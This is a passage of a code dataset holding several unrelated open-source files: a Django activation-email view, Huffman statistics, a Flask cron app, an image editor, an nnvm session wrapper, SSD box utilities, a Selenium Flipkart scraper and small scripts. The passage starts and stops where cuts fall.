email_subject_template = 'registration/activation_email_subject.txt'\n\n    if not request.user.is_anonymous():\n        return HttpResponseRedirect('/')\n\n    form = None\n    if request.method == 'POST':\n        form = ResendActivationEmailForm(request.POST)\n        if form.is_valid():\n            email = form.cleaned_data[\"email\"]\n            users = User.objects.filter(email=email, is_active=0)\n\n            if not users.count():\n                form._errors[\"email\"] = [\"This email is not registered or already activated.\"]\n            else:\n                REGISTRATION_SALT = getattr(settings, 'REGISTRATION_SALT', 'registration')\n                for user in users:\n                    activation_key = signing.dumps(\n                        obj=getattr(user, user.USERNAME_FIELD),\n                        salt=REGISTRATION_SALT,\n                    )\n                    context = {}\n                    context['activation_key'] = activation_key\n                    context['expiration_days'] = settings.ACCOUNT_ACTIVATION_DAYS\n                    context['site'] = get_current_site(request)\n\n                    subject = render_to_string(email_subject_template, context)\n                    # Force subject to a single line to avoid header-injection issues.\n                    subject = ''.join(subject.splitlines())\n                    message = render_to_string(email_body_template, context)\n                    user.email_user(subject, message, settings.DEFAULT_FROM_EMAIL)\n                return render(request, 'registration/resend_activation_email_done.html')\n\n    if not form:\n        form = ResendActivationEmailForm()\n\n    context = {\"form\": form}\n    return render(request, 'registration/resend_activation_email_form.html', context)\n","repo_name":"LunaSquee/lunasqu.ee-django","sub_path":"personal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"33213619226","text":"# Define some status global variables that are filled by other modules\n# count the status variables and provide statistics\n# status variables -> whether RunLength coding is valid, from the mesh structure, mesh vectors, and DCT blocks\n
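# (added note) the counters below are module-level globals: they accumulate over every DoStatistics_* call until GetProbability_GenerateHoffmanTable() builds the tables\n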
import collections as col\nimport huffman as hoff\nimport configuration as cfg\n\nmeshStruct_isRunLenghtCodingValid_Validcount = 0\nmeshVector_isRunLenghtCodingValid_Validcount = 0\nDCT_isRunLenghtCodingValid_Validcount = 0\n\nmeshStruct_isRunLenghtCodingValid_InValidcount = 0\nmeshVector_isRunLenghtCodingValid_InValidcount = 0\nDCT_isRunLenghtCodingValid_InValidcount = 0\n\nmeshStruct_Symbols_count_dic = {}\nmeshVector_Symbols_count_dic = {}\nDCT_Symbols_count_dic = {}\n\nmeshStruct_Symbols_prob_dic = {}\nmeshVector_Symbols_prob_dic = {}\nDCT_Symbols_prob_dic = {}\n\nmeshStruct_total_symbols_count = 0\nmeshVector_total_symbols_count = 0\nDCT_total_symbols_count = 0\n\nDCT_Total_Count = 0\nmesh_Total_Count = 0\n\ndef DoStatistics_mesh(encoded_meshStruct_list, encoded_meshVector_list):\n    global mesh_Total_Count, meshStruct_total_symbols_count, meshStruct_Symbols_count_dic, meshVector_total_symbols_count, meshVector_Symbols_count_dic\n\n    # count the total mesh cycles\n    mesh_Total_Count = mesh_Total_Count + 1\n    # Huffman\n    ## count the total number of symbols, then count the unique symbols and update the dictionary\n    if encoded_meshStruct_list:\n        for encoded_meshStruct in encoded_meshStruct_list:\n            meshStruct_total_symbols_count = meshStruct_total_symbols_count + len(encoded_meshStruct)\n            for symbol, count in col.Counter(encoded_meshStruct).items():\n                if symbol in meshStruct_Symbols_count_dic:\n                    meshStruct_Symbols_count_dic[symbol] = meshStruct_Symbols_count_dic[symbol] + count\n                else:\n                    meshStruct_Symbols_count_dic[symbol] = count\n\n    for encoded_meshVector in encoded_meshVector_list:\n        meshVector_total_symbols_count = meshVector_total_symbols_count + len(encoded_meshVector)\n        for symbol, count in col.Counter(encoded_meshVector).items():\n            if symbol in meshVector_Symbols_count_dic:\n                meshVector_Symbols_count_dic[symbol] = meshVector_Symbols_count_dic[symbol] + count\n            else:\n                meshVector_Symbols_count_dic[symbol] = count\n    # give every possible motion-vector symbol a nonzero count so it still receives a Huffman code\n    for x in range(-7, 8, 1):\n        if x in meshVector_Symbols_count_dic:\n            pass\n        else:\n            meshVector_Symbols_count_dic[x] = 1\n            meshVector_total_symbols_count += 1\n    return\n\ndef DoStatistics_DCT(encoded_dct_list):\n    global DCT_Total_Count, DCT_total_symbols_count, DCT_Symbols_count_dic\n\n    # count the total DCT cycles\n    DCT_Total_Count = DCT_Total_Count + 1\n    # Huffman\n    ## count the total number of symbols, then count the unique symbols and update the dictionary\n    for encoded_dct in encoded_dct_list:\n        DCT_total_symbols_count = DCT_total_symbols_count + len(encoded_dct)\n        for symbol, count in col.Counter(encoded_dct).items():\n            if symbol in DCT_Symbols_count_dic:\n                DCT_Symbols_count_dic[symbol] = DCT_Symbols_count_dic[symbol] + count\n            else:\n                DCT_Symbols_count_dic[symbol] = count\n    # give every possible DCT symbol a nonzero count so it still receives a Huffman code\n    for x in range(128):\n        if x in DCT_Symbols_count_dic:\n            pass\n        else:\n            DCT_Symbols_count_dic[x] = 1\n            DCT_total_symbols_count += 1\n    return\n\n\ndef GetProbability_GenerateHoffmanTable():\n    for symbol, count in DCT_Symbols_count_dic.items():\n        DCT_Symbols_prob_dic[symbol] = count/DCT_total_symbols_count\n    for symbol, count in meshVector_Symbols_count_dic.items():\n        meshVector_Symbols_prob_dic[symbol] = count / meshVector_total_symbols_count\n    for symbol, count in meshStruct_Symbols_count_dic.items():\n        meshStruct_Symbols_prob_dic[symbol] = count / meshStruct_total_symbols_count\n\n    hoff.generate_coding_dictionary(cfg.DCT_FRAME, DCT_Symbols_prob_dic)\n    # hoff.generate_coding_dictionary(cfg.MESH_FRAME, meshStruct_Symbols_prob_dic)\n
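    # (added note) the loops above turn raw counts into relative frequencies; each call below emits one Huffman code table per frame type\n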
    hoff.generate_coding_dictionary(cfg.MOTION_VECTORS_FRAME, meshVector_Symbols_prob_dic)\n\n    return","repo_name":"ahmedhussien91/VLC","sub_path":"statistics_module.py","file_name":"statistics_module.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"21845138622","text":"from flask import Flask, request, json, Response, jsonify, make_response\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\n# Instantiating the Flask application\napplication = Flask(__name__)\n\n# Instantiating the scheduler for the cronjob\nsched = BackgroundScheduler(daemon = True)\nsched.start()\n\n# Defining a cronjob function to run alongside the Flask app\n@sched.scheduled_job(trigger = 'cron', minute = '*')\ndef print_hello():\n    print('Hello world!')\n\n# Defining a single API endpoint\n@application.route('/test')\ndef test_func():\n    js = json.dumps({'Test': 'Successful!'})\n    return Response(js, status = 200, mimetype = 'application/json')\n\nif __name__ == '__main__':\n    # Starting Flask application\n    application.run(host = '0.0.0.0')\n","repo_name":"dkhundley/ds-quick-tips","sub_path":"002_flask_cronjob/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"40"} {"seq_id":"70295817082","text":"\"\"\"\n * (c) 2019-2021. Nurul GC\n * Young Programmer\n * Telecommunications Engineering student\n * Information Technology and Medicine.\n * Focus Faith Strength Patience\n * Allah in Command.\n\n    - MODULE RESPONSIBLE FOR IMAGE EDITING\n\"\"\"\n\nfrom datetime import date\nimport logging\nimport os\nfrom subprocess import getoutput\nfrom typing import List\n\nfrom fpdf import FPDF\nimport imageio\nimport PIL.Image\n\n\ndef dimensao_imagem(_filename: str) -> tuple:\n    \"\"\"identifies the image dimensions\n\n    :param _filename: name and location of the image\n    :return: a tuple containing the width and the height of the image\"\"\"\n    imagem = PIL.Image.open(_filename)\n    return imagem.size\n\n\ndef tamanho_imagem(_filename: str) -> str:\n    \"\"\"computes how many bytes the image takes\n\n    :param _filename: name and location of the image\n    :return: the size the image occupies on disk\"\"\"\n    num = os.path.getsize(_filename)\n    for x in ['bytes', 'KB', 'MB']:\n        if num < 1024.0:\n            return f\"{num:3.1f}{x}\"\n        num /= 1024.0\n\n\ndef debugpath() -> str:\n    if os.name == 'posix':\n        home = getoutput('echo $HOME')\n        return os.path.join(home, '.ima-debug')\n    return '.ima-debug'\n\n\ndef tempdir() -> str:\n    os.makedirs(f\"{debugpath()}/temp\", exist_ok=True)\n    return f\"{debugpath()}/temp\"\n\n\nclass ImagEditor:\n    \"\"\"ImaGC backend class\"\"\"\n\n    def __init__(self, _dir_salvar: str = None):\n        self.pdf = FPDF()\n        self.dir_salvar = _dir_salvar\n\n    def add_logo(self, _nome_logotipo: str, _nome_imagem: str = None, _dir_imagens: str = None):\n        \"\"\"add a logo to another image\n\n        :param _nome_imagem: name and location of the image\n        :param _nome_logotipo: name and location of the logo\n        :param _dir_imagens: location of the directory containing the images\n        :return: a new image with the logo in the bottom-right corner\"\"\"\n        if _dir_imagens and _nome_logotipo:\n            SQUARE_FIT_SIZE = 100\n            LOGO_FILENAME = _nome_logotipo\n            logoIm = PIL.Image.open(LOGO_FILENAME)\n            logoWidth, logoHeight = logoIm.size\n\n            if logoWidth > SQUARE_FIT_SIZE or logoHeight > SQUARE_FIT_SIZE:\n                logoWidth = SQUARE_FIT_SIZE\n                logoHeight = SQUARE_FIT_SIZE\n
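                # (added note) the logo is clamped to a fixed 100x100 square, so a wide or tall logo is distorted rather than scaled proportionally\n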
                logoIm = logoIm.resize((logoWidth, logoHeight))\n\n            for filename in os.listdir(_dir_imagens):\n                try:\n                    if not filename.endswith(\".png\") and not filename.endswith(\".jpg\") and not filename.endswith(\".jpeg\"):\n                        continue\n                    elif filename in LOGO_FILENAME:\n                        continue\n                    else:\n                        im = PIL.Image.open(f\"{_dir_imagens}/{filename}\")\n                        width, height = im.size\n\n                        im.paste(logoIm, (width - logoWidth, height - logoHeight), logoIm)\n                        im.save(os.path.join(f'{self.dir_salvar}', f\"imagc-{filename}\"))\n                        logging.debug(f\"Adding logo to the '{filename}'... SUCCESSFUL!\")\n                except Exception as erro:\n                    logging.critical(f\"- {erro}..\")\n                    raise Exception(erro)\n        elif _nome_imagem and _nome_logotipo:\n            SQUARE_FIT_SIZE = 100\n            LOGO_FILENAME = _nome_logotipo\n            logoIm = PIL.Image.open(LOGO_FILENAME)\n            logoWidth, logoHeight = logoIm.size\n\n            if logoWidth > SQUARE_FIT_SIZE or logoHeight > SQUARE_FIT_SIZE:\n                logoWidth = SQUARE_FIT_SIZE\n                logoHeight = SQUARE_FIT_SIZE\n                logoIm = logoIm.resize((logoWidth, logoHeight))\n\n            filename = _nome_imagem\n            im = PIL.Image.open(filename)\n            width, height = im.size\n            imagem = os.path.join(f\"{self.dir_salvar}/\", f\"imagc-{filename.split('/')[-1]}\")\n\n            try:\n                im.paste(logoIm, (width - logoWidth, height - logoHeight), logoIm)\n                im.save(imagem)\n                logging.debug(f\"Adding logo to the '{imagem}'... SUCCESSFUL!\")\n            except Exception as erro:\n                logging.critical(f\"{erro}..\")\n                raise Exception(erro)\n\n    def convertendo_gif(self, _images: List[str]):\n        \"\"\"converter function (images to gif)\n\n        :param _images: list of images\n        :return: a new image (.gif),\n            saved to the directory selected by the user\"\"\"\n        if self.dir_salvar.endswith('.gif'):\n            try:\n                imgData = [imageio.imread(img) for img in _images]\n                imageio.mimsave(self.dir_salvar, imgData, duration=1.0)\n                logging.debug(f\"Created the file '{self.dir_salvar}'.. SUCCESSFULLY!\")\n            except Exception as erro:\n                logging.critical(f\"- {erro}..\")\n                raise Exception(erro)\n        else:\n            raise NameError('Invalid Name for file, should end with \".gif\"...')\n\n    def convertendo_icone(self, _size: int, _nome_imagem: str):\n        \"\"\"converter function (image to ico)\n\n        :param _nome_imagem: name and location of the image\n        :param _size: icon dimension\n        :return: a new file (.ico), saved to the directory selected by the user\"\"\"\n        nome = \"\"\n        try:\n            SIZES = [[(16, 16)], [(32, 32)], [(64, 64)], [(256, 256)]]\n            img_to_icon = PIL.Image.open(_nome_imagem)\n            if _size == 16:\n                size = SIZES[0]\n                for sz in size[0]:\n                    nome = f\"{self.dir_salvar}/imagc-{sz}x{sz}.ico\"\n                    img_to_icon.save(nome, sizes=size)\n                    logging.debug(f\"Created the icon '{nome}'.. SUCCESSFULLY!\")\n            elif _size == 32:\n                size = SIZES[1]\n                for sz in size[0]:\n                    nome = f\"{self.dir_salvar}/imagc-{sz}x{sz}.ico\"\n                    img_to_icon.save(nome, sizes=size)\n                    logging.debug(f\"Created the icon '{nome}'.. SUCCESSFULLY!\")\n            elif _size == 64:\n                size = SIZES[2]\n                for sz in size[0]:\n                    nome = f\"{self.dir_salvar}/imagc-{sz}x{sz}.ico\"\n                    img_to_icon.save(nome, sizes=size)\n                    logging.debug(f\"Created the icon '{nome}'.. SUCCESSFULLY!\")\n            elif _size == 256:\n                size = SIZES[3]\n                for sz in size[0]:\n                    nome = f\"{self.dir_salvar}/imagc-{sz}x{sz}.ico\"\n                    img_to_icon.save(nome, sizes=size)\n                    logging.debug(f\"Created the icon '{nome}'.. SUCCESSFULLY!\")\n
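            # (added note) each branch writes a single-resolution .ico; Pillow also accepts several size tuples at once to build a multi-resolution icon\n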
            else:\n                raise IndexError(\"Invalid size for the file, should be one of [16, 32, 64, 256]!\")\n        except Exception as erro:\n            logging.critical(f\"- {erro}..\")\n            raise Exception(erro)\n\n    def convertendo_pdf(self, _images: List[str]):\n        \"\"\"converter function (images to pdf)\n\n        :param _images: list of images\n        :return: a new document (.pdf) containing the selected image(s),\n            saved to the directory selected by the user\"\"\"\n        if self.dir_salvar.endswith('.pdf'):\n            try:\n                for image in _images:\n                    width, height = dimensao_imagem(_filename=image)\n                    if width > height:\n                        self.pdf.add_page('L')\n                        self.pdf.image(image, x=0, y=0, w=int(1122 / 3.75), h=int(793 / 3.75))\n                    elif width < height:\n                        self.pdf.add_page('P')\n                        self.pdf.image(image, x=0, y=0, w=int(793 / 3.75), h=int(1122 / 3.75))\n                    else:\n                        self.pdf.add_page('L')\n                        self.pdf.image(image, x=0, y=0, w=int(1122 / 3.75), h=int(793 / 3.75))\n                self.pdf.output(self.dir_salvar, 'F')\n                logging.debug(f\"Created the file '{self.dir_salvar}'.. SUCCESSFULLY!\")\n            except Exception as erro:\n                logging.critical(f\"{erro}..\")\n                raise Exception(erro)\n        else:\n            raise NameError('Invalid Name for file, should end with \".pdf\"...')\n\n\nlogging.basicConfig(\n    filename=f\"{debugpath()}/{date.today()}-imagc.log\",\n    level=logging.DEBUG, format='\\n %(asctime)s - %(levelname)s - %(message)s'\n)\nlogging.info(f\"{'*' * 25} NEW DEBUG {'*' * 25}\")\n","repo_name":"ArtesGC/ImaGC","sub_path":"imagc/ie.py","file_name":"ie.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} {"seq_id":"7061861548","text":"from __future__ import absolute_import as _abs\nimport ctypes as _ctypes\nimport numpy as np\nfrom nnvm import symbol\nfrom nnvm._base import c_str, check_call, _LIB, c_array, nn_uint\n\nSessionHandle = _ctypes.c_void_p\nnn_float = _ctypes.c_float\n\ndef _get_numpy(cptr, dtype, shape):\n    if dtype != 0:\n        raise ValueError(\"only float32 is supported so far\")\n    size = 1\n    for s in shape:\n        size *= s\n    if size != 0 and shape:\n        dbuffer = (nn_float * size).from_address(_ctypes.addressof(cptr.contents))\n        return np.frombuffer(dbuffer, dtype=np.float32).reshape(shape).copy()\n    else:\n        return None\n\nclass Session(object):\n    def __init__(self, config='cpu'):\n        handle = SessionHandle()\n        check_call(_LIB.NNSessionCreate(_ctypes.byref(handle), c_str(config)))\n        self.handle = handle\n\n    def __del__(self):\n        check_call(_LIB.NNSessionClose(self.handle))\n\n    def run(self, fetch, feed_dict=None):\n        if isinstance(fetch, list):\n            fetch = symbol.Group(fetch)\n        feed_dict = feed_dict if feed_dict else {}\n        feed_placeholders = []\n        feed_dptr = []\n        feed_dtype = []\n        feed_shape_csr_ptr = [0]\n        feed_shape_data = []\n        src_list = []\n\n        for k, v in feed_dict.items():\n            assert isinstance(k, symbol.Symbol)\n            assert isinstance(v, np.ndarray)\n            feed_placeholders.append(k.handle)\n            # only convert to float32 for now\n            source_array = np.ascontiguousarray(v, dtype=np.float32)\n            # keep src_list alive for the duration of the call\n            src_list.append(source_array)\n            feed_dptr.append(source_array.ctypes.data_as(_ctypes.c_void_p))\n            feed_dtype.append(0)\n            feed_shape_data.extend(source_array.shape)\n            feed_shape_csr_ptr.append(len(feed_shape_data))\n        out_size = nn_uint()\n        out_dptr = _ctypes.POINTER(_ctypes.POINTER(nn_float))()\n        out_dtype = _ctypes.POINTER(nn_uint)()\n        out_shape_ndim = _ctypes.POINTER(nn_uint)()\n        out_shape_data = _ctypes.POINTER(_ctypes.POINTER(nn_uint))()\n\n
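        # (added note) these out-parameters are filled by the C library: per-output float buffers plus a dtype code, rank, and dimension array for each fetch\n        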
check_call(_LIB.NNSessionRun(\n self.handle, fetch.handle, nn_uint(len(src_list)),\n c_array(_ctypes.c_void_p, feed_placeholders),\n c_array(_ctypes.c_void_p, feed_dptr),\n c_array(nn_uint, feed_dtype),\n c_array(nn_uint, feed_shape_csr_ptr),\n c_array(nn_uint, feed_shape_data),\n _ctypes.byref(out_size),\n _ctypes.byref(out_dptr),\n _ctypes.byref(out_dtype),\n _ctypes.byref(out_shape_ndim),\n _ctypes.byref(out_shape_data)))\n ret = []\n for i in range(out_size.value):\n shape = tuple(out_shape_data[i][:out_shape_ndim[i]])\n ret.append(_get_numpy(out_dptr[i], out_dtype[i], shape))\n\n return ret[0] if len(ret) == 1 else ret\n","repo_name":"tqchen/tinyflow","sub_path":"python/tinyflow/_session.py","file_name":"_session.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":1986,"dataset":"github-code","pt":"40"} +{"seq_id":"29279424286","text":"import torch\n\n\ndef xywh_to_xyxy(boxes):\n return torch.cat((boxes[:, :2] - boxes[:, 2:] / 2, # xmin, ymin\n boxes[:, :2] + boxes[:, 2:] / 2), 1) # xmax, ymax\n\n\ndef xyxy_to_xywh(boxes):\n return torch.cat((boxes[:, 2:] + boxes[:, :2]) / 2, # cx, cy\n boxes[:, 2:] - boxes[:, :2], 1) # w, h\n\n\ndef IoU(box_a, box_b):\n # box_a and box_b are in xyxy form\n max_xy = torch.min(box_a[:, 2:].unsqueeze(1), box_b[:, 2:].unsqueeze(0))\n min_xy = torch.max(box_a[:, :2].unsqueeze(1), box_b[:, :2].unsqueeze(0))\n inter = torch.clamp((max_xy - min_xy), min=0, max=None)\n inter = inter[:, :, 0] * inter[:, :, 1]\n\n area_a = ((box_a[:, 2] - box_a[:, 0]) * (box_a[:, 3] - box_a[:, 1])).unsqueeze(1) # [A,B]\n area_b = ((box_b[:, 2] - box_b[:, 0]) * (box_b[:, 3] - box_b[:, 1])).unsqueeze(0) # [A,B]\n union = area_a + area_b - inter\n return inter / union # [A,B]\n\n\ndef encode(gt_boxes, priors):\n # gt_boxes and priors are in xyxy form\n # distance between match center and prior's center\n g_cxcy = ((gt_boxes[:, :2] + gt_boxes[:, 2:]) / 2 - priors[:, :2]) / (priors[:, 2:] * 0.1)\n # match wh / prior wh\n g_wh = torch.log((gt_boxes[:, 2:] - gt_boxes[:, :2]) / priors[:, 2:]) / 0.2\n\n # return target for smooth_l1_loss\n return torch.cat([g_cxcy, g_wh], 1) # [num_priors,4]\n\n\n# Adapted from https://github.com/Hakuyume/chainer-ssd\ndef decode(loc, priors):\n # loc and priors are in xywh form\n boxes = torch.cat((priors[:, :2] + loc[:, :2] * 0.1 * priors[:, 2:],\n priors[:, 2:] * torch.exp(loc[:, 2:] * 0.2)), 1)\n # xywh -> xyxy\n boxes[:, :2] -= boxes[:, 2:] / 2\n boxes[:, 2:] += boxes[:, :2]\n return boxes\n\n\ndef decode_batch(loc, priors):\n # loc and priors are in xywh form\n # loc shape: [batch_size, num_priors, 4]\n # priors shape: [num_priors, 4]\n boxes = torch.cat((\n priors[:, :2][None, :, :] + loc[:, :, :2] * 0.1 * priors[:, 2:][None, :, :],\n priors[:, 2:][None, :, :] * torch.exp(loc[:, :, 2:] * 0.2)), 2)\n\n # xywh -> xyxy\n boxes[:, :, :2] -= boxes[:, :, 2:] / 2\n boxes[:, :, 2:] += boxes[:, :, :2]\n return boxes\n","repo_name":"zzzxxxttt/pytorch_simple_SSD","sub_path":"utils/bbox2target.py","file_name":"bbox2target.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"9247860465","text":"import utils\nimport operations\n\n\ndef main():\n utils.header()\n account = operations.auth_account()\n if account :\n print('Olá ' + account['customer_name'])\n option_typed = operations.get_menu_options_typed(account)\n operations.do_operation(account, option_typed) \n else:\n print('Conta inválida')\n\nwhile 
True:\n main()\n utils.pause()\n utils.clear() \n","repo_name":"dinaerteneto/python-gerenciando-arquivos","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9918310620","text":"import sys\r\nsys.setrecursionlimit (30000)\r\ndef palindrome(string):\r\n if len(string)<=1:\r\n return True\r\n else:\r\n if string[0]==string[len(string)-1]:\r\n return palindrome(string[1:len(string)-1])\r\n else:\r\n return False\r\ndef prime(a,b):\r\n\r\n if (b>a**(1/2)):\r\n return True\r\n if a%b==0:\r\n return False\r\n else:\r\n return prime(a,b+1)\r\ndef prime_palindrome(a,b):\r\n if a>b:\r\n return\r\n else:\r\n if palindrome(str(a)) and prime(a,2):\r\n print(a)\r\n prime_palindrome(a+1,b)\r\na=eval(input(\"Enter the starting point N:\\n\"))\r\nif a==1:\r\n a= a+1\r\nb=eval(input(\"Enter the ending point M:\\n\"))\r\nprint(\"The palindromic primes are:\")\r\nprime_palindrome(a,b)\r\n\r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/mnhper001/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36431069039","text":"import datetime\nimport os\nimport time\nimport pyautogui\nimport numpy as np\nimport cv2\nimport pandas as pd\nimport db\nimport time\n\n#-------------------------\ndef recognize_attendence():\n recognizer = cv2.face.LBPHFaceRecognizer_create() # cv2.createLBPHFaceRecognizer()\n recognizer.read(\"TrainingImageLabel\"+os.sep+\"Trainner.yml\")\n harcascadePath = \"haarcascade_frontalface_default.xml\"\n faceCascade = cv2.CascadeClassifier(harcascadePath)\n df = db.execute(\"SELECT * FROM student\")\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n # Initialize and start realtime video capture\n cam = cv2.VideoCapture(0)\n cam.set(3, 640) # set video width\n cam.set(4, 480) # set video height\n # Define min window size to be recognized as a face\n minW = 0.1 * cam.get(3)\n minH = 0.1 * cam.get(4)\n attended = False\n color = (10, 159, 255)\n while True:\n ret, img = cam.read()\n if ret:\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(gray, 1.2, 5,minSize = (int(minW), int(minH)),flags = cv2.CASCADE_SCALE_IMAGE)\n for(x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), color , 2)\n Id, conf = recognizer.predict(gray[y:y+h, x:x+w])\n\n if conf < 100:\n\n aa = [i for i in df if Id == i[0]]\n confstr = \" {0}%\".format(round(100 - conf))\n tt = str(Id)+\"-\"+aa[0][1]\n else:\n Id = ' Unknown '\n tt = str(Id)\n confstr = \" {0}%\".format(round(100 - conf))\n\n\n if(100-conf) > 70 and (100-conf) < 99:\n tt = tt + \" [Pass]\"\n cv2.putText(img, str(tt), (x+5,y-5), font, 1, (255, 255, 255), 2)\n date = datetime.datetime.utcnow()\n attended = True\n\n db.execute(\"INSERT INTO absensi (user_id,waktu) VALUES (%s,'%s')\"%(Id,date))\n \n else:\n cv2.putText(img, str(tt), (x + 5, y - 5), font, 1, (255, 255, 255), 2)\n color = (25, (100-conf)*(255/100), 0)\n \n if (100-conf) > 70:\n cv2.putText(img, str(confstr), (x + 5, y + h - 5), font,1, (0, 255, 0),1 )\n elif (100-conf) > 50:\n \n cv2.putText(img, str(confstr), (x + 5, y + h - 5), font, 1, (0, 255, 255), 1)\n else:\n cv2.putText(img, \"unknown\", (x + 5, y + h - 5), font, 1, (0, 0, 255), 1)\n \n if attended:\n break\n\n\n\n cv2.imshow('Attendance', img)\n if attended:\n break\n if (cv2.waitKey(1) == 
ord('q')):\n break\n \n cam.release()\n cv2.destroyAllWindows()\n\n\n","repo_name":"FathanAkram-app/AbsensiFaceRecognitionService","sub_path":"python/OpenCVMethod/Recognize.py","file_name":"Recognize.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8828462500","text":"from selenium import webdriver\r\ndriver = webdriver. Chrome('C:/Users/User/Downloads/chromedriver.exe')\r\ndriver.get(\"https://www.flipkart.com\")\r\ndriver.maximize_window()\r\n#Close the pop-up\r\ndriver.find_element_by_xpath(\"/html/body/div[2]/div/div/button\").click()\r\n#searching for iphones\r\nsearch = driver.find_element_by_xpath(\"//body/div[@id='container']\"\r\n \"/div[1]/div[1]/div[1]/div[2]/div[2]/form[1]/div[1]/div[1]/input[1]\")\r\nsearch.send_keys('iPhone')\r\n#clicking enter\r\nsearch.submit()\r\n\r\n#CSV file\r\nfrom selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\nprices=[] #List to store price of the product\r\ndriver.get(\"https://www.flipkart.com/\"\r\n \"search?q=iPhone&otracker=search&otracker1=search&marketplace=FLIPKART&as-show=on&as=off\")\r\ncontent = driver.page_source\r\nsoup = BeautifulSoup(content)\r\nfor a in soup.findAll('a',href=True, attrs={'class':'_2ZdXDB'}):\r\n price=a.find('div', attrs={'class':'_3xFhiH'})\r\n prices.append(price.text)\r\n\r\ndf = pd.DataFrame({'Price':prices})\r\ndf.to_csv('products.csv', index=False, encoding='utf-8')\r\n\r\n","repo_name":"Sanjana1621/FlipKartProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16809832532","text":"\"\"\"\nForm for creating a language object\n\"\"\"\nfrom django import forms\n\nfrom ...models import Language\n\n\nclass LanguageForm(forms.ModelForm):\n \"\"\"\n DjangoForm Class, that can be rendered to create deliverable HTML\n\n Args:\n forms : Defines the form as an Model form related to a database object\n \"\"\"\n\n class Meta:\n model = Language\n fields = [\n 'code',\n 'english_name',\n 'native_name',\n 'text_direction',\n ]\n","repo_name":"digitalfabrik/coldaid-backend","sub_path":"src/cms/forms/languages/language_form.py","file_name":"language_form.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"71535490680","text":"from typing import List, Tuple\n\nfrom otm.otm.entity.component import Component\nfrom otm.otm.entity.otm import OTM\nfrom otm.otm.entity.representation import RepresentationElement\nfrom otm.otm.entity.trustzone import Trustzone\nfrom otm.otm.util.representation import build_size, build_position, make_relative\n\nTZ_PADDING = 30\n\n\ndef _get_trustzone_components(trustzone_id: str, components: List[Component]):\n return list(filter(lambda component: component.parent == trustzone_id, components))\n\n\ndef _get_first_representation(component: Component):\n return component.representations[0] if component.representations and len(component.representations) > 0 else None\n\n\ndef calculate_missing_trustzones_representations(otm: OTM, representation_id):\n for trustzone in otm.trustzones:\n if not trustzone.representations:\n tz_components = _get_trustzone_components(trustzone.id, otm.components)\n TrustZoneRepresentationCalculator(representation_id, trustzone, tz_components).calculate()\n\n\nclass 
TrustZoneRepresentationCalculator:\n def __init__(self, representation_id: str, trustzone: Trustzone, trustzone_components: List[Component]):\n self.representation_id = representation_id\n self.trustzone = trustzone\n self.components = trustzone_components\n\n self.component_representations = list(filter(lambda r: r, map(_get_first_representation, trustzone_components)))\n\n def calculate(self):\n if self.component_representations:\n self.trustzone.representations = [self.__calculate_trustzone_representation_by_components()]\n self.__make_components_representations_relative()\n\n def __calculate_trustzone_representation_by_components(self):\n left_x, right_x, top_y, bottom_y = self.__calculate_trustzone_limits_by_components()\n\n return RepresentationElement(\n id_=f'{self.trustzone.id}-representation',\n name=f'{self.trustzone.name} Representation',\n representation=self.representation_id,\n position=build_position(left_x, top_y, TZ_PADDING),\n size=build_size(left_x, right_x, top_y, bottom_y, TZ_PADDING)\n )\n\n def __calculate_trustzone_limits_by_components(self) -> Tuple:\n \"\"\"\n Calculate the trustzone representation by the position of its children components.\n The coordinates x, y starts as 0,0 in the top left corner of the diagram\n \"\"\"\n left_x, right_x, top_y, bottom_y = (None,) * 4\n\n for representation in self.component_representations:\n x, y = representation.position['x'], representation.position['y']\n width, height = representation.size['width'], representation.size['height']\n\n if not left_x or x < left_x:\n left_x = x\n if not right_x or right_x < (x + width):\n right_x = (x + width)\n\n if not top_y or y < top_y:\n top_y = y\n if not bottom_y or bottom_y < (y + height):\n bottom_y = (y + height)\n\n return left_x, right_x, top_y, bottom_y\n\n def __make_components_representations_relative(self):\n tz_position = self.trustzone.representations[0].position\n for component in self.components:\n make_relative(_get_first_representation(component), tz_position)\n","repo_name":"iriusrisk/startleft","sub_path":"slp_visio/slp_visio/parse/representation/trustzone_representation_calculator.py","file_name":"trustzone_representation_calculator.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"36350815671","text":"import os\n\nfrom twilio.rest import TwilioRestClient\n\nimport jinja2\nimport webapp2\n \n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n 